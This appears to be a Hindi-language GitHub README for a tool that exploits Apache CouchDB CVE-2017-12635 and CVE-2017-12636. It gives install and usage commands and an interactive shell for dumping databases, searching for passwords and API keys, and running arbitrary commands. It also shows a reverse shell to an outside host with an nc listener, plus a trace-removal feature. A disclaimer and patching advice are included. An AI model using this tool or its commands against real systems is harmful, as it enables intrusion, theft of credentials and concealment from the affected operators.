
विशेषाधिकार वृद्धि और RCE के लिए CouchDB CVE-2017-12635/12636 का शोषण करता है, फिर कमांड निष्पादन, डेटाबेस ब्राउज़िंग और रिवर्स शेल के साथ एक इंटरैक्टिव शेल प्रदान करता है।
यह टूल Apache CouchDB में दो गंभीर कमजोरियों का फायदा उठाता है:
| CVE | विवरण | गंभीरता |
|---|---|---|
| CVE-2017-12635 | JSON पार्सिंग बायपास के माध्यम से विशेषाधिकार वृद्धि | 🔴 गंभीर |
| CVE-2017-12636 | क्वेरी सर्वर के माध्यम से रिमोट कोड निष्पादन | 🔴 गंभीर |
curl http://target:5984/
✨ विशेषताएँ
✅ स्वचालित एक्सप्लॉइटेशन - सभी पर राज करने के लिए एक कमांड
✅ इंटरैक्टिव शेल - उपयोगकर्ता-अनुकूल कमांड इंटरफ़ेस
✅ डेटाबेस व्यूअर - सभी डेटाबेस और दस्तावेज़ ब्राउज़ करें
✅ पूर्ण JSON प्रदर्शन - संपूर्ण दस्तावेज़ सामग्री देखें
✅ ग्लोबल खोज - सभी डेटाबेस में कीवर्ड खोजें
✅ सिस्टम कमांड - लक्ष्य पर मनमाना कमांड निष्पादित करें
✅ रिवर्स शेल - पूर्ण इंटरैक्टिव शेल प्राप्त करें
✅ कमांड इतिहास - अपनी गतिविधियों का ट्रैक रखें
✅ ऑटो क्लीनअप - एक्सप्लॉइटेशन के बाद निशान हटाएँ
✅ रंगीन आउटपुट - पढ़ने और समझने में आसान
📦 स्थापना पूर्वापेक्षाएँ bash
python3 --version
क्लोन करें और इंस्टॉल करें bash
git clone https://github.com/darabium/couchdb-exploit.git cd couchdb-exploit
pip install -r requirements.txt
आवश्यकताएँ txt
requests>=2.25.0 urllib3>=1.26.0
🚀 उपयोग मूल उपयोग bash
python3 couchdb-exploit.py -t <TARGET_IP> -p
python3 couchdb-exploit.py -t 192.168.1.100 -p 5984
कमांड लाइन विकल्प bash
python3 couchdb-exploit.py -h
usage: couchdb-exploit.py [-h] -t TARGET [-p PORT]
arguments: -h, --help show this help message and exit -t TARGET, --target TARGET Target IP address or hostname -p PORT, --port PORT Target port (default: 5984)
💻 कमांड्स
एक्सप्लॉइट सफल होने के बाद, आपके पास एक इंटरैक्टिव शेल होगा:
📊 उदाहरण
couchdb> db
[+] 39 databases:
_replicator (0 docs)
_users (12 docs)
admin (5 docs)
passwords (25 docs)
core-configuration (8 docs) ...
डेटाबेस सामग्री देखें bash
couchdb> view passwords
[*] Total documents: 25
couchdb> search password
✅ Found in 'passwords' ID: user1 Content: { "username": "root", "password": "rootpass123" }
✅ Found in 'config' ID: app_settings Content: { "db_password": "secret123", "api_key": "sk_live_abc123" }
couchdb> exec whoami [+] Executing: whoami [+] Command executed!
couchdb> exec id [+] Executing: id [+] Command executed!
nc -lvnp 4444
couchdb> reverse 10.0.0.1 4444 [+] Setting up reverse shell to 10.0.0.1:4444 [!] Make sure listener is running: nc -lvnp 4444 [?] Continue? (y/n): y [+] Reverse shell triggered!
🖼️ स्क्रीनशॉट एक्शन में एक्सप्लॉइट
https://via.placeholder.com/800x400?text=Exploit+Demo+Screenshot डेटाबेस व्यू
https://via.placeholder.com/800x400?text=Database+View रिवर्स शेल
https://via.placeholder.com/800x400?text=Reverse+Shell
⚠️ अस्वीकरण
महत्वपूर्ण: यह टूल केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है।
🚫 बिना स्पष्ट अनुमति के सिस्टम पर उपयोग न करें
🚫 लेखक किसी भी दुरुपयोग के लिए ज़िम्मेदार नहीं है
🚫 केवल नियंत्रित वातावरण या अपने स्वयं के सिस्टम में उपयोग करें
✅ परीक्षण से पहले हमेशा लिखित प्राधिकरण प्राप्त करें
✅ जिम्मेदार प्रकटीकरण प्रथाओं का पालन करें
इस टूल का उपयोग करके, आप इन शर्तों से सहमत होते हैं।
🔐 सुरक्षा सुझाव
यदि आप सिस्टम व्यवस्थापक हैं:
तुरंत CouchDB ≥ 1.7.0 या ≥ 2.1.1 में अपग्रेड करें
पोर्ट 5984 तक पहुंच प्रतिबंधित करने के लिए फ़ायरवॉल का उपयोग करें
प्रमाणीकरण सक्षम करें और मजबूत पासवर्ड का उपयोग करें
संदिग्ध गतिविधि के लिए लॉग की निगरानी करें
अपने इंफ्रास्ट्रक्चर का नियमित सुरक्षा ऑडिट करें
त्वरित समाधान bash
sudo apt-get update sudo apt-get install couchdb=2.1.1 # Or latest version
sudo ufw allow from 192.168.1.0/24 to any port 5984
📚 संदर्भ
CVE-2017-12635 - NVD
CVE-2017-12636 - NVD
Apache CouchDB सुरक्षा
Exploit-DB
👤 लेखक
darabium
GitHub: @darabium
Telegram: @darabium
⭐ समर्थन
यदि आपको यह उपयोगी लगता है:
⭐ रिपॉजिटरी को स्टार करें
🐛 समस्याएँ रिपोर्ट करें
🔧 सुधारों में योगदान करें
📢 दूसरों के साथ साझा करें
📄 लाइसेंस
यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।
सुरक्षा अनुसंधान के लिए ❤️ के साथ बनाया गया
⬆ ऊपर जाएँ
| संस्करण | असुरक्षित | सुधारित संस्करण |
|---|
| Apache CouchDB < 1.7.0 | ✅ हाँ | 1.7.0 |
| Apache CouchDB 1.x.x | ✅ हाँ | 1.7.0 |
| Apache CouchDB 2.0.0 | ✅ हाँ | 2.1.1 |
| Apache CouchDB 2.1.0 | ✅ हाँ | 2.1.1 |
| Apache CouchDB ≥ 2.1.1 | ❌ नहीं | - |
| कमांड | विवरण | उदाहरण |
|---|
db | दस्तावेज़ गणना के साथ सभी डेटाबेस दिखाएँ | db |
view <db> | डेटाबेस में सभी दस्तावेज़ देखें (पूर्ण JSON) | view passwords |
raw <db> | कच्चा सर्वर प्रतिसाद दिखाएँ | raw admin |
count <db> | डेटाबेस में दस्तावेज़ों की गणना करें | count users |
search <keyword> | सभी डेटाबेस में कीवर्ड खोजें | search admin |
exec <command> | सिस्टम कमांड निष्पादित करें | exec whoami |
reverse <ip> <port> | रिवर्स शेल सेटअप करें | reverse 10.0.0.1 4444 |
history | कमांड इतिहास दिखाएँ | history |
help | यह मेनू दिखाएँ | help |
exit | सफाई के साथ बाहर निकलें | exit |